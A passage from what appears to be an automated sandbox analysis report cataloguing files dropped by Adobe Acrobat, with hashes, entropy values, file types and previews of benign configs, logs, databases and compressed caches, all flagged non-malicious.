                                                    Entropy (8bit):5.273178868843303
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJf21rPeUkwRe9:YvXKXfbI4SDkZc0v6zG+16Ukee9
                                                    MD5:21A0E181FFD047B860BD33C2E730AE6C
                                                    SHA1:616CC0DBBAC0B826505E5014D1E6189C2380D2D7
                                                    SHA-256:CE069E4695DF62C8CAC54AF5C3E7EE32C0BBA888D20C42D719F95200793B7E59
                                                    SHA-512:756A6359CCE26B22FE901111F40D5F231EE490B10CAD3D6E11B2AE6B508F4EC4D77DEE3E0FEDF6FD4100AE7289301CE23B0452C2F252D3D102EF43FE594E18D8
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1090
                                                    Entropy (8bit):5.658679046198159
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XU4SDkzv6camXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSH:YvoSDsHBgkDMUJUAh8cvMH
                                                    MD5:BC4F879BF41814B138092FD2926066B6
                                                    SHA1:EDB92A3175E8FB98C4FF33471057D6D58B513508
                                                    SHA-256:9618007B8322F9B33D54E292D48719B8CE3A9EADE96BC0B2B3B8E0F12E0740C6
                                                    SHA-512:ADCF27F165AFE6D4D4C2D38859F88CE93D0E1BCB3F851F64938657CDB6E30776B2CB2D4D020040777E70D42E5EA2F783ED7A8FC867AFFFB74D86700CFBA91096
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.249189611771682
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfshHHrPeUkwRe9:YvXKXfbI4SDkZc0v6zGUUUkee9
                                                    MD5:6370BD531949089E8158C1BAD0590109
                                                    SHA1:84093263C09DCA1C2ECBD42E49C63E9B8FD741B2
                                                    SHA-256:FB5DAC8945BE2D3F2CFE24F2504A12AEC3749B694CD92BC736019AB3660913F9
                                                    SHA-512:B3935A33B6AEAE9DACB8D798336EA7CDBD9C55DB2133922A72195B1B01E68EB175729B74178891915E0A7B3B58C357315AC151AA516D93A4077A4B2CAF1DCDB8
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):282
                                                    Entropy (8bit):5.259737593525384
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJTqgFCrPeUkwRe9:YvXKXfbI4SDkZc0v6zGTq16Ukee9
                                                    MD5:B8835145F4870A9DADF12D7494B01C24
                                                    SHA1:2B0FA604BD4D05ED3A5AD8134807EC9FAF260C71
                                                    SHA-256:127F99128ACC0B0713D08110A08DC1EC041394A8A7C1B6B82B0FC3AE72AE2D89
                                                    SHA-512:1887DC8CA235F827618F8C869133CD7EBA27E0EF5FF5488D4552E228CE1A73A17C7A5D13ADECBCCE37ED0531962FEBD98AE1B06E83FC0BBCA82AA740178392F5
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:3:e:e
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Preview:....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2814
                                                    Entropy (8bit):5.141927270813135
                                                    Encrypted:false
                                                    SSDEEP:24:YSxqasjayjvOGzrqSKZZdR0UWPGxBj3SX8j0SnMLP2b2LS5Cw5YhcS2hU5P9vtkF:YhkYrqDZD713Se4TiPn5YSS2ux9WQY
                                                    MD5:B8EAC46FD11E9A9B1D7451B0F72C1316
                                                    SHA1:FD9B2A0DDC3995F1E0AD504CEA408076D0A3500C
                                                    SHA-256:F06D295557E75276BCB70115F456A7699C032650BC752A53B17B7DD3A95240A4
                                                    SHA-512:16B87634AE481BB5FC2F7FBD127C1F159CC78BCA9CFED3F6B8C05293EBDDC2D6DDF26468A2E3C5844FB97972A3E4F303BF2B13C4A3F018EFA4FB206696BC268D
                                                    Malicious:false
                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"f0ee05806e8b4d04ed95e0776da12fdd","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736912743000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"4a87c5f3fe2e47ab49acb71de78e3f32","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736912743000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"50924261a79d9923db9a7aba2e304748","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736912742000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e45cd78bf065d468ddaa64563b28774d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736912742000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"315e6b2a187e79ce48c874cc3697ba0d","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736912742000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"d679ebf3c80ec57845f9bc5dfc0b915c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.1882412400208848
                                                    Encrypted:false
                                                    SSDEEP:48:TGufl2GL7msEHUUUUUUUULSvR9H9vxFGiDIAEkGVvp/:lNVmswUUUUUUUUL+FGSItj
                                                    MD5:158B7C552FCD58A778A7ACFD5CF36955
                                                    SHA1:4C45F827A9A3891760F13258A46B260EDC1B203D
                                                    SHA-256:C3E2A53AE3A56137C159852ABED92C14FA22CCB4C544EB68FDFE94507E923BF0
                                                    SHA-512:ADF5FAE5F19192E59EE56557ADE4276FB8FBCB81F4CE816F16A0D566BC08D72415702A49042A7A424B296B3F45D0E75058DCF1B53369A916C6E44DA437EAF6BF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.6085542434546876
                                                    Encrypted:false
                                                    SSDEEP:48:7MhKUUUUUUUUUUfvR9H9vxFGiDIAEkGVvSqFl2GL7msj:7nUUUUUUUUUUXFGSItsKVmsj
                                                    MD5:95F92C6FE51A414DAFC023293B281E05
                                                    SHA1:BC9B5709D85AF043D0CBE817F924042D96884356
                                                    SHA-256:F6222BF371E04D8D09F17C2E370A1CCFA2AD89AA9ED625515C6E64F947E7BA51
                                                    SHA-512:9A6C3532F4ED9248670F224F5CEA19FD0B0636190C8827BF789CC25693BB209AEED5C5D2E5CCEF3696C60C29D492DDA911E049D2CBA48A36716465C66B362279
                                                    Malicious:false
                                                    Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):66726
                                                    Entropy (8bit):5.392739213842091
                                                    Encrypted:false
                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgrI3VCxQ0L2M6HW4vEDTHP7PfYyu:6a6TZ44ADErI3QxQXM6ADvfK
                                                    MD5:530018F111061FBF07EC508F06A71A69
                                                    SHA1:0DC791698F25C02B186E832AD9FFFA1929823257
                                                    SHA-256:95CB085CC4AF575931B5FCFCD7DF8441FF4411D3CA1227A81041F41B2FF015CF
                                                    SHA-512:3393F67B28C55DA153DEC5BD7225C23295496D54AAB5349B28C00016DF0FE848465B98705532B12D2142E3FB0A15477B2D1AAC286C67567B5B59A84AAC2B51C7
                                                    Malicious:false
                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.505069684106714
                                                    Encrypted:false
                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sClAQKw:Qw946cPbiOxDlbYnuRKIqH
                                                    MD5:9AD0BF51FF16A228255FD7AF6C281309
                                                    SHA1:1010D019C7B2E87870EA4E935B945659186C3EB0
                                                    SHA-256:5F7035DB990396AEB84AB9BA85D7AC0642F973ED4FADC6FBD0A3C6DF6948678B
                                                    SHA-512:1F28926A40CABED50EB32300E6F7D89CF0141BBFF962023B8209E37C746E72176E218B1330AC3C51CC39C24B30AF1DEDB677F0C1AED4AEB198737C47477ADBB9
                                                    Malicious:false
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .2.2.:.4.5.:.4.5. .=.=.=.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PDF document, version 1.6, 0 pages
                                                    Category:dropped
                                                    Size (bytes):358
                                                    Entropy (8bit):5.05993646744761
                                                    Encrypted:false
                                                    SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOnQRCedrCedamCSyAAO:IngVMre9T0HQIDmy9g06JXgRCelCePlX
                                                    MD5:75EA308467FE386098C189E914C3E651
                                                    SHA1:561464B1B3CFB238EB8343A2C66DC4656FDEE8EC
                                                    SHA-256:4C9CA21C349778CD0CCC441773F8ED845E3AFB887C94144AF51884277881467A
                                                    SHA-512:BD8C08A77A162045633E4A7C690EC0F891924525A93C8CF442CB5D7DED57F62D6ACB338D44FF481ADB3357098F8A921362F5FEBE7F8A2020BB4EE01E44668888
                                                    Malicious:false
                                                    Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<E255EBF50B95DE41869ADD3299D42880><E255EBF50B95DE41869ADD3299D42880>]>>..startxref..127..%%EOF..
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.345946398610936
                                                    Encrypted:false
                                                    SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                    MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                    SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                    SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                    SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                    Malicious:false
                                                    Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15099
                                                    Entropy (8bit):5.347704735611812
                                                    Encrypted:false
                                                    SSDEEP:384:frBOJP435iP5q0lW87xwcOR0gPSDrll1yt8WAomCeDZcZp2pYfYf+jdTqWwG3kcR:3AC
                                                    MD5:95287833D3F81559344331CD3F48E8FD
                                                    SHA1:F3E0D090B1C2A2F2B2E2376EFFAA743050A796B3
                                                    SHA-256:6A96169C5A00F1170057B2B79CE5436B32EA27BA53A48DCB44EA635D4999A67B
                                                    SHA-512:960B577966E1736438C8DABD472A75C98794A2F3851EE1C21A01E748BC2A238A1D001AF89A1D25127F7848B445600F09419135C193B487EFA69F8F1514481B69
                                                    Malicious:false
                                                    Preview:SessionID=5d1263d4-4a24-483e-8f11-939414c9415e.1736912739728 Timestamp=2025-01-14T22:45:39:728-0500 ThreadID=3328 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5d1263d4-4a24-483e-8f11-939414c9415e.1736912739728 Timestamp=2025-01-14T22:45:39:729-0500 ThreadID=3328 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5d1263d4-4a24-483e-8f11-939414c9415e.1736912739728 Timestamp=2025-01-14T22:45:39:729-0500 ThreadID=3328 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5d1263d4-4a24-483e-8f11-939414c9415e.1736912739728 Timestamp=2025-01-14T22:45:39:729-0500 ThreadID=3328 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5d1263d4-4a24-483e-8f11-939414c9415e.1736912739728 Timestamp=2025-01-14T22:45:39:729-0500 ThreadID=3328 Component=ngl-lib_NglAppLib Description="SetConf
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):29752
                                                    Entropy (8bit):5.389303297959968
                                                    Encrypted:false
                                                    SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rw:k
                                                    MD5:3F6C0E4FEEEC4DF1AE38EF05AB6E7558
                                                    SHA1:AE54FEA37E2718FC6445D95675696526D9878E68
                                                    SHA-256:127A39A3A4CED109EF3F0843A39321BA28C881600F227A49F0CA243FC5B1FA7A
                                                    SHA-512:D0A3E03C6906E59CB5D0ED338CDCC050C8256D29685DF054E38AADCCBC190459C44A93C838582CC72726E1E282B705E6E885F9C2A01EF89216E34F3AB04914E5
                                                    Malicious:false
                                                    Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                    MD5:3A49135134665364308390AC398006F1
                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                    Malicious:false
                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                    MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                    SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                    SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                    SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                                    MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                                    SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                                    SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
                                                    SHA-512:8AAB79958BF39F014FBA7F69287FE0C357746E63FA3482DE3231BDF4A97B964A0815DAF7BFE9751C55BA6BE618E0A964CEB23FC30B4FA9DFEB284F42EBA897BF
                                                    Malicious:false
